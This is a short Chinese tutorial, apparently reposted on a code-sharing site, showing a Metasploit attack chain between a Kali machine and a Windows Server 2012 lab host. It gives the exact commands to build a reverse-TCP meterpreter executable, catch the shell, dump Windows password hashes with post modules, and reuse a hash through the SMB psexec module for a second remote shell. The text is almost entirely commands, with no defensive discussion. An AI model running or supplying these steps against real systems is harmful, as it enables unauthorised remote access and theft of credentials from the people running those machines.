码上快乐

相关内容   简体   繁体

利用msf抓取密码,并用hash登录

本文转载自  查看原文  2020-02-07 16:41  1637    msf

kali : 192.168.3.136

windows server 2012 : 192.168.3.129

1、生成一个exe远控

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.136 LPORT=12345 -f exe > /root/test.exe

2、反弹到kali

启动msf

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.3.136

set lport 12345

run

 

3、抓取windows密码

run post/windows/gather/hashdump

run post/windows/gather/smart_hashdump

4、使用hash进行登录

use exploit/windows/smb/psexec

设置ip,账号,hash

set rhosts 192.168.3.129

set SMBuser 用户名

set SMBPass hash

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.3.136

set lport 1111

反弹成功

 




免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 MSF的利用 fiddler 抓取华为登录页的登录账号密码 Kali MSF漏洞利用 msf木马生成及利用 利用SSLStrip截获https协议--抓取邮箱等密码 利用 John the Ripper 破解用户登录密码 利用MSF批量打RMI漏洞 MSF利用永恒之蓝漏洞 Kali之msf简单的漏洞利用 windows中抓取hash小结(上)
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM